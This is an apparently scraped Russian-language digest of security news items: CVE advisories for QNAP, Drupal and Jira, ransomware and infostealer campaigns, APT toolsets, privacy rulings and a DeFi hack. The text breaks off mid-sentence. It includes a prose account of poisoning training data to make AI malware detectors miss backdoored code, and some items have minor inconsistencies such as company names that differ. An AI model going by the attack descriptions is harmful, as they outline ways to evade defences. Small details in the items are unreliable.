Уязвимость CVE-2022-22721 затрагивает 32-битные модели устройств QNAP NAS, а CVE-2022-23943 – устройства с включенным фильтром контента mod_sed в Apache HTTP Server.

В настоящее время QNAP изучает эти уязвимости и готовится вскоре выпустить исправления. Для того чтоб обезопасить себя от возможных атак через уязвимость CVE-2022-22721 до выхода патчей, пользователям устройств QNAP рекомендуется использовать для LimitXMLRequestBody значение по умолчанию «1M». В случае с CVE-2022-23943 в качестве меры предосторожности следует отключить mod_sed. На NAS-устройствах, работающих под управлением операционной системы QTS, mod_sed в Apache HTTP Server отключен по умолчанию.

Разработчики CMS-системы Drupal выпустили обновления в ветках 9.2 и 9.3, чтобы устранить две уязвимости. Одна из них позволяет обойти контроль доступа к редакциям сущностей, другая — изменить критичные либо конфиденциальные данные. Степень опасности угрозы в обоих случаях оценена как умеренная. Проблема обхода ограничений на доступ, согласно бюллетеню, возникла из-за неполной интеграции Entity API с существующими разрешениями. В результате пользователи с типовым доступом на редактирование контент-сущностей получили возможность выборочно модифицировать данные в базах нодов и медиаконтента. Данная уязвимость присутствует только в Drupal 9.3.х и актуальна для сайтов, на которых управление состояниями осуществляется через редакции Drupal. Пользователям рекомендуется установить обновление 9.3.12. Причиной появления возможности внести нежелательные изменения через Form API является неадекватная проверка ввода. Уязвимость проявляется при обработке некоторых сторонних или кастомных форм в модуле ядра (стандартные формы Drupal она не затрагивает). Эксплойт позволяет внести недопустимые значения в поля формы или перезаписать данные, которые могут оказаться критически важными. Патчи включены в состав сборок 9.3.12 и 9.2.18, бэкпорта для продуктов с истекшим сроком поддержки не предвидится. В Drupal 7 эта дыра отсутствует.

Компания RVision обновила платформу анализа информации об угрозах R-Vision Threat Intelligence Platform (TIP) до версии 2.5. Ключевые изменения платформы коснулись логики обогащения индикаторов компрометации, работы с инструментом бюллетеней и карточками уязвимостей, а также произошли серьезные изменения в интерфейсе системы. В новой версии R-Vision TIP разработчик улучшил логику обогащения индикаторов компрометации дополнительным контекстом. Теперь пользователи могут настраивать предельное количество дней хранения данных обогащения. По истечении заданного периода система автоматически повторно запросит данные обогащения, что поможет пользователям более точно обрабатывать информацию об индикаторах. Значительная часть улучшений новой версии R-Vision TIP связана с доработками инструмента бюллетеней. Бюллетени об угрозах и уязвимостях служат для информирования подведомственных организаций и уполномоченных сотрудников о новых угрозах безопасности, актуальных уязвимостях в программном и аппаратном обеспечении, релевантных для той или иной инфраструктуры или организации. В платформе теперь есть возможность создавать бюллетени об одной или нескольких уязвимостях, при этом в новой версии работать с разделом уязвимостей стало еще удобнее: для каждой уязвимости отображается наличие бюллетеня и его идентификатор. В R-Vision TIP версии 2.5 при просмотре карточки уязвимости, а также при создании и редактировании бюллетеня об уязвимости отражается вся структура дефектов безопасности Common Weakness Enumeration (CWE) с учетом вложенных элементов. Это позволит пользователю лучше понимать взаимосвязь уязвимости с CWE, и, следовательно, направлять в подведомственные организации более подробные бюллетени. При создании бюллетеня об уязвимости список уязвимого программного обеспечения теперь отображается еще более логично, в формате «название ПО: версии ПО 1.x - 1.n». Это значительно облегчит процесс поиска необходимых программных средств в списке, а также повысит информативность бюллетеней. Разработчик внес изменения в R-Vision Threat Intelligence Feed (R-Vision TI Feed) - собственный фид R-Vision, собирающий информацию об индикаторах компрометации и других сущностях из открытых источников. Теперь имена субъектов угроз и названия экземпляров вредоносного ПО в R-Vision TI Feed автоматически нормализуются и приводятся к единообразному виду, что позволит избежать дублирования сущностей. Кроме того, произошли существенные улучшения в интерфейсе системы – он полностью видоизменился. В обновленной версии появились единые шаблоны взаимодействия, благодаря которым пользоваться платформой стало еще удобнее. Библиотека компонентов, которая приобрела единый вид во всех продуктах R-Vision, делает процесс работы более интуитивно понятным. «Наша основная задача - непрерывное развитие функциональности платформы. Так, в ближайшем будущем мы планируем ряд функциональных доработок, которые ускорят процесс внедрения платформы R-Vision TIP, а также упростят процесс передачи инцидентов в систему R-Vision SOAR. Кроме того, мы продолжаем расширять перечень доступных нашим пользователям поставщиков данных TI, что позволяет аналитикам SOC получать максимально полную и качественную информацию об угрозах, а также постоянно развиваем интеграционные возможности платформы с актуальными средствами защиты», — отметила Валерия Чулкова, менеджер продукта R-Vision TIP.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Кибератака произошла 10 апреля на одной из рабочих станций отдела геологии и разработки месторождений компании.
image


Один из крупнейший индийских нефтеперерабатывающих заводов Indian Oil стал жертвой атаки программы-вымогателя, которая привела к отключению компьютеров и IT-систем компании.

Киберпреступники потребовали выкуп в размере около $7,5 млн. Как сообщил представитель компании Тридив Хазарика изданию The Times of India, в настоящее время нет никаких сведений о личностях хакеров или о том, как им удалось проникнуть в сети Indian Oil.

Кибератака произошла 10 апреля на одной из рабочих станций отдела геологии и разработки месторождений компании Indian Oil. По словам представителя, операции по добыче нефти продолжаются в штатном режиме. Платформа SAP не пострадала. Проблема затронула только персональные компьютеры, установленные в офисах.

Группа IT-специалистов работает с компанией над укреплением системы межсетевого экрана Oil India.

Манипулирование информацией, используемой для обучения систем, предлагает практически неотслеживаемый метод обхода защиты на базе ИИ.
image


В течение последнего десятилетия искусственный интеллект использовался для распознавания лиц, оценки кредитоспособности и предсказания погоды. В то же время участились случаи изощренных взломов с использованием более скрытных методов. Сочетание ИИ и кибербезопасности было неизбежным, поскольку обе области искали лучшие инструменты и новые способы использования своих технологий. Но есть серьезная проблема, которая угрожает подорвать эти усилия и может позволить злоумышленникам обойти цифровую защиту незамеченными.

Как сообщило издание The Washington Post, опасность заключается в отравлении данных. Манипулирование информацией, используемой для обучения систем, предлагает практически неотслеживаемый метод обхода защиты на базе ИИ. Многие компании могут быть не готовы справиться с растущими рисками. Ожидается, что к 2028 году мировой рынок кибербезопасности ИИ увеличиться в три раза до $35 млрд. Поставщикам услуг безопасности и их клиентам, возможно, придется комбинировать несколько стратегий для обеспечения должного уровня кибербезопасности.

Имея огромное количество данных, компьютеры можно научить правильно классифицировать информацию. Тот же подход используется в кибербезопасности. Для поимки вредоносного ПО компании загружают в свои системы данные и позволяют ИИ учиться самостоятельно. Компьютеры, вооруженные многочисленными примерами как хорошего, так и плохого кода, могут научиться выявлять вредоносные программы. Системам машинного обучения требуется огромное количество правильно помеченных образцов для точного выявления угроз. Даже крупнейшие ИБ-компании могут сопоставлять и классифицировать лишь ограниченное количество примеров вредоносного ПО, поэтому у них нет иного выбора, кроме как дополнять свои обучающие данные. Некоторые данные могут быть краудсорсинговыми.

Тщательно создавая вредоносный код, помечая его образцы как хорошие, а затем добавляя их к большому пакету данных, хакер может обмануть нейронную сеть и выдать опасный код за безвредный. Поймать такие образцы кода практически невозможно. Код бэкдора может полностью обойти защитные механизмы, отравив менее 0,7% данных, отправляемых в систему машинного обучения. Таким образом система машинного обучения может стать уязвимой, даже если она использует лишь небольшой объем непроверенных данных с открытым исходным кодом.

Один из способов предотвратить отравление данных — регулярно проверять точность всех меток в обучающих данных ученым, разрабатывающим модели искусственного интеллекта. Например, исследователи из компании OpenAI LLP в ходе анализа наборов данных для нового инструмента для создания изображений регулярно пропускали данные через специальные фильтры, чтобы обеспечить точность каждой метки.

Производителю не известно о каких-либо случаях фальсификации результатов тестирования в реальной жизни.
image


Специалисты ИБ-компании WithSecure помогли производителю домашних тестов на коронавирус Cue Health исправить уязвимость, благодаря которой можно было подделывать результаты.

Молекулярный тест Cue Health позволяет с помощью мазка из носа узнавать, болен человек COVID-19, или нет. Результаты приходят через 20 минут на мобильное устройство по Bluetooth.

Консультант WithSecure Кен Ганнон (Ken Gannon) , как можно подделать результаты теста.

«Мне удалось изменить свой отрицательный результат на положительный путем перехвата и изменения данных в процессе их передачи с датчика Cue на мобильное приложение на телефоне. Мои результаты были сертифицированы путем выполнения контролируемого теста в приложении Health App. Для изменения положительного результата на отрицательный процесс практически такой же. Это может стать проблемой, если кто-то, кто, как и я, знает, что делать, вдруг решит сфальсифицировать результат», – сообщил Ганнон.

В тесте используется два отдельных аппаратных компонента – набор для взятия мазка из носа (картридж и тампон) и датчик для считывания данных Cue Reader. Пользователь вставляет картридж в датчик, берет мазок из носа с помощью тампона, а затем вставляет тампон в картридж, который делает анализ и отправляет результаты датчику. Затем по Bluetooth данные с датчика передаются приложению Health App на смартфоне пациента.

Ганнон уведомил о своем открытии компанию Cue Health, которая незамедлительно отреагировала, инициировав расследование. В результате уязвимость была исправлена. Производителю не известно о каких-либо случаях фальсификации результатов тестирования в реальной жизни.

Уязвимость, отслеживаемая как CVE-2022-0540 , имеет рейтинг 9,9 из 10
image


Atlassian устранила критическую ошибку в своем программном обеспечении Jira, обозначенную как CVE-2022-0540 (CVSS 9.9), которая позволяла обходить аутентификацию. Злоумышленник, не прошедший проверку подлинности, может создать специально созданный HTTP-запрос уязвимому программному обеспечению и выполнитить произвольный код

Об уязвимости сообщила Хоада из Viettel Cyber Security, исследовательской компании в области информационной безопасности.

Уязвимость затрагивает следующие продукты Jira:
  • Jira Core Server, Jira Software Server и Jira Software Data Center: все версии до 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x до 8.20. 6 и 8.21.x
  • Jira Service Management Server и Jira Service Management Data Center: все версии до 4.13.18, 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x до 4.20.6, и 4.21.х
Исправленные версии Jira и Jira Service Management: 8.13.18, 8.20.6 и 8.22.0, а также 4.13.18, 4.20.6 и 4.22.0.

Atlassian также отметил, что уязвимость затрагивает собственные и сторонние приложения, только если они установлены в одной из вышеупомянутых версий Jira или Jira Service Management и используют уязвимую конфигурацию.

Пользователям настоятельно рекомендуется обновиться до одной из исправленных версий, чтобы предотвратить возможные попытки эксплуатации. Atlassian также предусмотрел меры по смягчению последствий для тех пользователей, которые не могут установить исправленную версию Jira или Jira Service Management и используют любые уязвимые версии приложения. Компания рекомендует пользователям обновить приложение до исправленной версии.

Пользователи уязвимых приложений могут снизить риск для взлома, отключив приложение до получения обновлений.

Стоит отметить, что критическая уязвимость удаленного выполнения кода в Atlassian Confluence ( CVE-2021-26084 , оценка CVSS: 9,8) активно использовалась в прошлом году для установки майнеров криптовалюты на скомпрометированные серверы.

К такому соглашению пришли стороны по итогам судебного разбирательства в рамках поданных исков на период с марта по май 2020 года.
image


Компания Zoom Video Communications выплатит $85 млн пользователям, которые пострадали от практики зумбомбинга — когда пранкеры врываются в видеочаты и начинают оскорблять их участников, а также слать неприличные изображения. Об этом сообщает The Guardian.

Пандемия Covid-19 вызвала волну «зум-бомбардировок», когда хакеры и шутники врывались на виртуальные встречи с оскорбительными сообщениями и изображениями. Теперь Zoom согласился на «историческую» выплату в размере 85 миллионов долларов в рамках коллективного иска, поданного его пользователями, в том числе церковными группами, которые заявили, что были травмированы сбоями.

В частности среди пострадавших оказалась Лютеранская церковь в Сан-Франциско.Два года назад в лютеранской церкви Святого Павла проводился урок по изучению Библии, большинство участников которого были пожилыми людьми. Однако вскоре после начала сеанса «Zoom позволил хакерам… совершить «зум-бомбирование» класса». Злоумышленники заставили участников конференции смотреть порнографические видеоматериалы», в том числе изображения сексуального насилия над детьми и физического насилия.

Организатор не смог удалить киберпреступника из комнаты собрания и попросил участников выйти и снова присоединиться к собранию. Инцидент оставил ведущего и участников «травмированными и беспомощными», говорится в иске.

Юрист Zoom Марк Моламфи назвал соглашение «прорывным» и заверил, что оно позволит обеспечить защищённость пользователей, а адвокат истцов Тина Волфсон сказала, что соглашение стало «историческим».

Новый баннер дает возможность пользователям отказаться от всех отслеживающих cookie файлов в один клик.
image


Европейские пользователи YouTube и поисковика Google теперь могут отказаться от всех cookie-файлов при посещении веб-сайтов. Раньше Google разрешал пользователям принимать все cookie файлы одним кликом, но настроить их было намного сложнее - людям приходилось выбирать нужные пункты во всплывающем меню. По словам CNIL(французский надзорный орган по защите данных), эта асимметрия была незаконной и заставляла пользователей принимать cookie-файлы в интересах рекламного бизнеса Google.

Из-за этого CNIL оштрафовал Google на 150 млн евро и пригрозил дополнительным штрафом в размере 100 000 евро в день, если компания в течение трех месяцев не подчинится действующим в стране правилам.

После штрафа Google представил новый дизайн. В обновленном баннере теперь три кнопки. В дополнение к существующим кнопкам есть новая кнопка «Запретить все», которая позволяет пользователям полностью отказаться от cookie файлов одним щелчком мыши.

«Начиная с Франции мы будем распространять этот опыт на остальную часть Европейской экономической зоны, Великобританию и Швейцарию. Вскоре у пользователей в этом регионе появится новый выбор cookie файлов, который можно будет принять или отклонить одним щелчком мыши.»,- пишет в блоге менеджер по продуктам Google Саммит Адхья, объявляя об изменениях.

И все же многие пользователи просто не увидят обновленное всплывающее окно. Если вы уже вошли в учетную запись Google, Google не нужно получать ваше согласие, поскольку ваши настройки уже сохранены на странице вашего профиля. Другими словами, у пользователей, у которых нет учетной записи Google, будет больше возможностей по настройке cookie файлов. А если у вас есть учетная запись Google, рекомендуется проверить настройки конфиденциальности.

Европа вводит новые правила для интернет-компаний по контролю за контентом.
image


Закон о цифровых услугах и Закон о цифровых рынках (Digital Services Act (DSA)) призван создать более безопасное цифровое пространство, в котором будут защищены основные права пользователей, и создать равные условия для бизнеса.
Европейские политики достигли соглашения по обширному пакету новых правил для технологических платформ, которые могут означать большие изменения в надзоре за всем, от алгоритмов социальных сетей до цифровой рекламы, с потенциальными последствиями по всему миру.
В соответствии с ним, Google, Meta (запрещена в РФ), Microsoft, Amazon и другие IT-гиганты будут обязаны удалять противоправный контент, ограничить таргетированную рекламу, а также объяснять работу своих алгоритмов регулирующим органам.

Новые правила также запрещают IT-компаниям, таким как Amazon, Google и Meta*, использовать конфиденциальную информацию — возраст, пол, раса, религиозные и политические взгляды — для показа таргетированной рекламы. За нарушения предусмотрены штрафы.

«Сегодняшнее соглашение, дополняющее политическое соглашение о Законе о цифровых рынках, принятое в прошлом месяце, посылает сильный сигнал всем европейцам, всем предприятиям ЕС и нашим международным партнерам», — заявила президент Европейской комиссии Урсула фон дер Ляйен.

Введенные обязательства пропорциональны характеру услуг компании и адаптированы к количеству пользователей, поясняет Еврокомиссия. Это означает, что к крупным онлайн-платформам и поисковикам (сюда входят сервисы с более 45 млн активных пользователей в ЕС в месяц) требования будут строже.

С них будут взимать до 0,05% годового дохода для покрытия расходов на мониторинг соблюдения ими правил, а нарушение закона будет грозить им штрафом на сумму до 6% от их глобального оборота. Агентство Bloomberg ранее подсчитало, что для Amazon штраф составит €26 млрд, а для Google — €14 млрд. При повторном нарушении компании могут запретить вести бизнес в ЕС. Небольшие предприятия с менее чем 45 млн активных пользователей в месяц будут освобождены от части новых правил.
Кроме того, вводится запрет на так называемые темные паттерны — недобросовестную практику, когда интерфейс сайта или приложения сбивает пользователей с толку, заставляя их сделать определенный выбор или выманивая у них конфиденциальную информацию. Процедура отмены подписки должна быть такой же простой, как и сама подписка.

Закон "гарантирует, что платформы будут нести ответственность за риски, которые их сервисы могут представлять для общества и граждан", заявила еврокомиссар по вопросам конкуренции Маргрет Вестагер.

DSA был составлен на фоне политических и регуляторных мер против онлайн-платформ по всему миру. Соглашение было достигнуто утром в субботу после более чем 16-часовых переговоров между странами-членами ЕС, Еврокомиссией и Европарламентом. DSA является второй частью плана еврокомиссара Маргрете Вестагер по поводу сдерживания американских технологических гигантов.

На разработку проекта закона ушло два года. «DSA следует принципу, согласно которому то, что является незаконным в оффлайне, должно быть незаконным и в онлайне. Он направлен на защиту цифрового пространства от распространения нелегального контента и обеспечение защиты основных прав пользователей», — отмечают в Комиссии. Закон вступит в силу в 2024 году.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Дипфейки используются злоумышленниками для дезинформации, создания порнографического контента и подделки документов.
image


В ближайшие годы технология дипфейков будет широко использоваться организованной преступностью. Как сообщили специалисты из Европола, правоохранительным органам потребуется улучшить навыки и технологии, чтобы не отставать от использования преступниками дипфейков.

Дипфейки активно используются злоумышленниками в трех ключевых сферах: дезинформация, порнографический контент и подделка документов. Подобные атаки будут становиться все более реалистичными по мере совершенствования технологии в ближайшие годы.

Европол привел несколько примеров того, как ложная информация может распространяться с помощью дипфейков и приводить к разрушительным последствиям. К ним относятся геополитическая сфера, например, создание фальшивого экстренного оповещения об угрозе. Технология создания дипфейков также может быть использована для атак на бизнес, создания компрометирующих видео- или аудиодипфейков, якобы записанных руководителем компании.

В то время как мошенникам становится все труднее подделывать паспорта из-за современных защитных мер, «цифровые изображения лиц представляют собой новый подход к мошенничеству с документами». Например, технологии могут комбинировать или трансформировать лицо человека, которому принадлежит паспорт, и лицо человека, желающего получить паспорт нелегально, увеличивая шансы на успешное прохождение проверки личности.

Дипфейки могут негативно повлиять на судебный процесс, например, путем искусственного манипулирования или создания контента для доказательства или опровержения чьей-либо вины.

В ближайшие месяцы и годы весьма вероятно, что злоумышленники будут все чаще использовать технологию дипфейков для совершения преступлений и проведения кампаний по дезинформации.

По словам экспертов, широкое использование дипфейков потребует от законодательства установления руководящих принципов и обеспечения соблюдения. Кроме того, социальные сети и другие поставщики online-услуг должны играть более важную роль в выявлении и удалении дипфейкового контента со своих платформ.

В арсенал Earth Berberoka входят как хорошо проверенные инструменты, так и совершенно новое семейство вредоносного ПО.
image


Специалисты ИБ-компании Trend Micro рассказали о недавно обнаруженной новой APT-группировке, которую они назвали Earth Berberoka (GamblingPuppet). Группировка специализируется на взломах online-казино в Юго-Восточной Азии. Кроме того, хакеры атакуют Windows, Linux и macOS-системы с помощью вредоносного ПО, которое обычно связывается с Китаем.

В арсенал Earth Berberoka входят как хорошо проверенные надежные инструменты PlugX и Gh0st RAT, так и совершенно новое семейство вредоносного ПО, названное исследователями PuppetLoader.

PuppetLoader представляет собой сложное, пятиступенчатое ПО, использующее весьма интересные техники, такие как перехват загружаемых модулей для запуска вредоносного кода и сокрытие вредоносной нагрузки и модулей в модифицированных BMP-файлах.

PuppetLoader обладает следующим функционалом: установка интерактивной оболочки, загрузка файлов на систему, скачивание файлов с системы, завершение процессов, составление списка процессов, установка модулей, обратный вызов учетных данных и перечисление сеансов RDP.

В ходе исследования специалисты Trend Micro также обнаружили версии вредоносного ПО oRAT для Windows и macOS. Примечательно, что вредонос написан на языке программирования Go.

Как уже упоминалось выше, Earth Berberoka также использует хорошо известный троян для удаленного доступа PlugX, использующийся для кибершпионажа уже более десяти лет, и как минимум три разные версии не менее старого вредоносного ПО Gh0st RAT, исходный код которого есть в открытом доступе.

Одна из версий Gh0st RAT оснащена интересной деструктивной функцией: заменяет главную загрузочную запись сообщением «I am virus ! F*ck you :-)».

Кроме того, Earth Berberoka использует следующие известные вредоносные программы:

Quasar RAT – троян для удаленного доступа для Windows с открытым исходным кодом;

AsyncRAT – троян для удаленного доступа с открытым исходным кодом, позволяющий удаленно мониторить и контролировать устройства через зашифрованное соединение;

Trochilus – незаметный троян для удаленного доступа, способный обходить песочницу, предназначенный для шпионских операций.

Большая часть знаний о взломе телефонов поступила от северокорейцев, которых отправили в Китай на работу в сфере IT.
image



Северная Корея постоянно усиливает контроль над информацией, которую граждане могут получить из-за пределов страны. Однако, некоторым людям все же удалось обойти жесткий государственный контроль над смартфонами. Об этом сообщило информагентство Reuters.

Смартфоны получили широкое распространение в Северной Корее, но лишь немногим людям разрешен доступ к интернету. Мобильные устройства в стране должны иметь правительственные приложения и другие элементы управления, которые отслеживают использование и ограничивают доступ. По словам специалистов из американской некоммерческой организации Lumen, большая часть знаний, необходимых для взлома телефонов, поступила от северокорейцев, которых отправили в Китай на работу в сфере IT.

Как сообщили двое перебежчиков, им удалось обойти правительственные ограничения, прежде чем они бежали из страны. Цель взлома заключалась в том, чтобы обойти защиту телефона и получить возможность устанавливать различные приложения, фотофильтры и загружать медиафайлы, которые в противном случае были бы запрещены.

Государственные инженеры Северной Кореи отреагировали на методы, описанные хакерами, и отключили интерфейс USB, используемый для доступа к телефону. Северная Корея также отключила доступ к Wi-Fi на устройствах и вновь ввела его только недавно, когда такие элементы управления, как SIM-карты, пароли и поддерживаемые устройства, были разработаны для использования Wi-Fi только в разрешенных целях.

TA410 вооружились новой версией трояна для удаленного доступа LookBack с функцией инфостилера.
image



Кибершпионская группа, известная своими атаками на критическую инфраструктуру в странах Африки, Среднего Востока и в США, вооружилась новой версией трояна для удаленного доступа с функцией инфостилера.

Группа TA410 состоит из трех команд: FlowingFrog, LookingFrog и JollyFrog. По данным специалистов ИБ-компании ESET, они работают независимо друг от друга, но используют одну и ту же команду хакеров для проведения операций целенаправленного фишинга и имеют общую сетевую инфраструктуру.

Тактики и некоторые инструменты TA410 также использует киберпреступная группировка APT10 (Stone Panda, TA429), атакующая коммунальные предприятия в США и дипломатические миссии в странах Среднего Востока и Африки.

Впервые о TA410 сообщили специалисты ИБ-компании Proofpoint в августе 2019 года, когда группа проводила фишинговые кампании, нацеленные на американские коммунальные предприятия. В ходе кампании хакеры рассылали жертвам письма с документами, содержавшими вредоносные макросы, устанавливающие на системы модульное вредоносное ПО LookBack.

Примерно через год группа вернулась с новым бэкдором под названием FlowCloud, также использовавшимся в атаках на коммунальные предприятия в США. Вредонос представлял собой троян для удаленного доступа и обеспечивал хакерам доступ к установленным на взломанной системе приложениям, клавиатуре, мыши, экрану, файлам, сервисам и процессам.

В ходе расследования атак TA410 специалисты ESET обнаружили новую версию FlowCloud, способную записывать звук через микрофон компьютера, мониторить действия с буфером обмена и делать фото с помощью подключенной к устройству камеры.

Помимо целенаправленного фишинга, для получения первоначального доступа к системам жертв TA410 эксплуатирует уязвимости в доступных через интернет приложениях Microsoft Exchange, SharePoint и SQL Servers.

Каждая входящая в TA410 команда использует разные наборы инструментов. JollyFrog полагается на готовые варианты QuasarRAT и Korplug (PlugX), LookingFrog использует X4, «сырой» имплант с функцией удаленного доступа, а также вредоносное ПО LookBack.

В свою очередь, FlowingFrog использует загрузчик Tendyron, который доставляется с помощью Royal Road RTF, используя его для загрузки FlowCloud, а также второго бэкдора на базе Gh0stRAT (он же Farfli).

Amazon делится пользовательскими данными с 41 рекламными партнерами.
image



Компания Amazon и сторонние сервисы используют данные «умных» динамиков для таргетинга рекламы в нарушение обязательств по конфиденциальности, согласно исследователям из четырех университетов США. Академики из Вашингтонского университета, Калифорнийского университета в Дэвисе, Калифорнийского университета в Ирвине и Северо-восточного университета утверждают , что Amazon обрабатывает голосовые данные для анализа интересов пользователей, и использует их для показа таргетированной рекламы.

По словам ученых, действия разработчиков Amazon и Skills (ПО, интегрированного с сервисом голосового помощника Amazon Alexa) часто несовместимо с политикой конфиденциальности. Эксперты разработали систему аудита для оценки того, как собираются, используются и передаются голосовые данные. Они создали несколько поддельных персонажей с разными профилями использования умных динамиков, а затем смоделировали взаимодействия, чтобы проверить статистические различия в суммах, предлагаемых для аудио и web-рекламы.

Как сообщили ученые, данные «умной» колонки Echo собираются как Amazon, так и третьими сторонами, и Amazon делится пользовательскими данными с 41 рекламными партнерами.

«Вывод Amazon о рекламных интересах на основе разговоров пользователей является явным нарушением политики и публичных заявлений компании. Amazon не обеспечивает прозрачности в использовании данных, и поэтому ей нельзя доверять для защиты конфиденциальности пользователей», — отметили исследователи.

В документе специалистов также отмечается, что Amazon в 2018 году получила патент под названием Voice-based determination of physical and emotional characteristics of users («Голосовое определение физических и эмоциональных характеристик пользователей»), в котором описывается, как «текущее физическое и/или эмоциональное состояние пользователя может облегчить возможность предоставления узконаправленного аудиоконтента, такого как реклама, пользователю».

В одном только апреле вредонос осуществил 10 тыс. атак в более чем 150 странах и регионах мира.
image



Специалисты ИБ-компании Bitdefender рассказали об обнаруженной в начале нынешнего года кампании по распространению вредоносного ПО RedLine Stealer. Только в этом месяце с его помощью злоумышленники осуществили 10 тыс. атак в более чем 150 странах и регионах мира, включая США, Германию, Египет, Китай и Канаду. Однако на самом деле истинное число атак может быть выше, поскольку специалисты учитывали только количество уведомлений от решений безопасности Bitdefender.

RedLine Stealer представляет собой ПО для похищения паролей, которое можно купить на хакерских форумах по весьма низкой цене. В ходе зафиксированной Bitdefender кампании вредонос распространяется с помощью набора эксплоитов RIG Exploit Kit через уязвимость CVE-2021-26411 в Internet Explorer. Судя по количеству атакуемых стран, инфостилер не заточен под атаки на какую-то конкретную страну.

После выполнения на атакуемой системе RedLine Stealer ищет имена пользователя, а также сведения об аппаратном обеспечении, установленных браузерах и антивирусных решениях, и извлекает такие данные, как пароли, сохраненные данные банковских карт, криптовалютные кошельки, учетных данные для VPN-сервисов и пр. Похищенная информация затем передается на подконтрольный злоумышленникам удаленный C&C-сервер.

С помощью RedLine Stealer хакеры могут извлекать учетные данные из браузеров, FTP-клиентов, приложений электронной почты, мессенджеров и VPN-сервисов, которые затем можно продать в даркнете.

Правительства пытались остановить протесты или подавить инакомыслие подобным способом.
image



Согласно новому отчету некоммерческой организации Access Now, отслеживающей доступ в интернет во всем мире, десятки репрессивных правительств намеренно отключали интернет в своей стране с целью остановить протесты или подавить инакомыслие в 2021 году.

В прошлом году власти преднамеренно отключали интернет как минимум 182 раза в 34 странах, превышая показатели 2020 года. Власти в Буркина-Фасо, Кубе, Чаде, Эсватини, Иране, Иордании, Мьянме, Нигере, Пакистане, Судане и других странах отключили интернет в ответ на протесты, а в секторе Газа, Мьянме и Эфиопском регионе Тыграй отключение от Сети было осуществлено во время военных конфликтов.

Чад, Республика Конго, Иран, Нигер, Уганда и Замбия отключали интернет во время выборов, а власти Бенина, Ирака и Гамбии — во время «ключевых национальных событий», таких как школьные экзамены.

Самым большим нарушителем оказалось правительство Индии, которое отключало интернет в некоторых частях страны не менее 106 раз. Индия возглавляет данный список четвертый год подряд.

Самые длительные отключения интернета произошли в Пакистане, где 4,5 млн жителей Территории племен федерального управления провели без интернета почти четыре года. Жители штата Ракхайн в Мьянме провели без интернета 593 дня до 3 февраля 2021 года, а жители Джамму и Кашмира в Индии провели без интернета 551 день. Жители Тыграя (северной провинции Эфиопии) были отключены от интернета на протяжении 539 дней, и отключение продолжается по сей день.

Бангладеш, Буркина-Фасо, Чад, Куба, Эсватини, Индия, Индонезия, Иран, Ирак, Иордания, Казахстан, Мьянма, Пакистан, Сенегал, Южный Судан, Судан, Туркменистан и Уганда были среди 18 правительств, которые отключали мобильный интернет своим гражданам.

Власти 22 стран ввели более целенаправленные отключения, заблокировав доступ к сайтам социальных сетей, таким как Facebook, Twitter и TikTok, во время протестов. Некоторые пошли еще дальше, блокируя или запрещая использование VPN для обхода сбоев.

Кто стоит за попыткой атаки и с какой целью она была осуществлена, пока неизвестно.
image



Власти Гавайев совместно с федеральными властями США расследуют попытку взлома подводного кабеля и пытаются установить, кто за ней стоит, хакеры, работающие на правительство какой-либо страны, жаждущие наживы киберпреступники или кто-то еще.

Как пояснил глава Управления внутренней безопасности штата Гавайи Фрэнк Пэйс (Frank Pace) в интервью Дине Темпл-Растон (Dina Temple-Raston) и Шону Пауэрсу (Sean Powers) в подкасте Click Here, злоумышленники предположительно взломали частную компанию на материке, у которой, среди прочего, есть доступ к серверам подводного кабеля, однако мотивы их пока не ясны.

«Мы пытаемся у становить, была ли это известная киберпреступная группировка, желавшая скомпрометировать сотрудников или руководство организации или установить вымогательское ПО, чтобы вывести из строя их системы», - сообщил Пэйс.

Подводный кабель прокладывается по морскому дну, имеет протяженность более тысяч километров и состоит из нескольких жил. То есть, он представляет собой несколько более тонких кабелей, обернутых прочной стальной изоляцией. За одну секунду подводные кабели могут передавать данные почти на 300 км со скоростью 400 ГБ/с.

Взлом подводного кабеля, помимо прочего, открывает огромные возможности для экономического шпионажа, пояснил Пэйс. Кроме того, к нему подключена критическая инфраструктура. По понятным причинам, последствия взлома подводного кабеля с целью экономического шпионажа установить очень трудно.

По словам Пэйса, в штате Гавайи взломов подводных кабелей ранее не происходило. Имели место другие кибератаки, но до взлома подводных кабелей дело еще не доходило.

«Совсем недавно мы были свидетелями того, как организации городских и окружных органов власти становились жертвами различных форм вредоносных программ или программ-вымогателей. Эти инциденты не были запланированными или целенаправленными, но из-за уязвимостей в системах организации были скомпрометированы. Я думаю, что мы, вероятно, столкнемся с ростом подобных атак в ближайшем будущем», - отметил Пэйс.

Проект децентрализованных финансов был взломан во второй раз за 2 месяца
image



Проект децентрализованных финансов (DeFi) Deus Finance был взломан неизвестным злоумышленником. Киберпреступник похитил более $13,4 млн в криптовалюте, сообщили эксперты по кибербезопасности PeckShield.

По данным исследователей, неизвестный злоумышленник применил эксплойт, воспользовавшись ошибкой в флэш-кредите. Мгновенные кредиты - это кредиты, взятые с требованием, чтобы заемная сумма была возвращена в том же блоке.
Хакер смог искусственно завышать стоимость некоторых активов, занимать средства внутри протокола и получать прибыль после погашения займа. Таким образом киберпреступнику удалось заработать $13,4 млн.

Стоит отметить, что это второй взлом протокола за последние два месяца. В марте неизвестный злоумышленник атаковал проект аналогичным образом и похитил $3 млн.

Вымогатели делают все возможное для того, чтобы уплата выкупа была самым выгодным решением для жертвы.
image


<p> Специалисты ИБ-копании Check Point <a href=" ">проанализировали</a> побочные последствия атак вымогательского ПО на организации и выяснили, что финансовый ущерб от них почти в семь раз превышает сумму требуемого вымогателями выкупа. </p> <p> Финансовый ущерб включает затраты на реагирования на атаку и восстановление систем, штрафы, стоимость услуг мониторинга и ущерб от простоя и срыва операций. </p> <p> Кибервымогатели устанавливают сумму выкупа в соответствии с определенной схемой, беря за основу доходы жертвы. По данным Check Point, сумма выкупа обычно составляет от 0,7% до 5% от годового дохода. Средний процент составляет 2,82%. </p> <p> Многие кибервымогатели предлагают скидки жертвам, готовым заплатить сразу же. Так, если пострадавшая организация заплатит выкуп в течение нескольких дней, его сумма может быть меньше на 20-25%. </p> <p> В 2021 году организации научились лучше справляться с двойным вымогательством, что существенно сократило продолжительность атак. Однако двойное вымогательство несет за собой дополнительные расходы для жертвы, которой также приходится иметь дело с утратой доверия со стороны клиентов и репутационным ущербом. </p> <p> Пострадавшие от атак вымогательского ПО организации скрывают 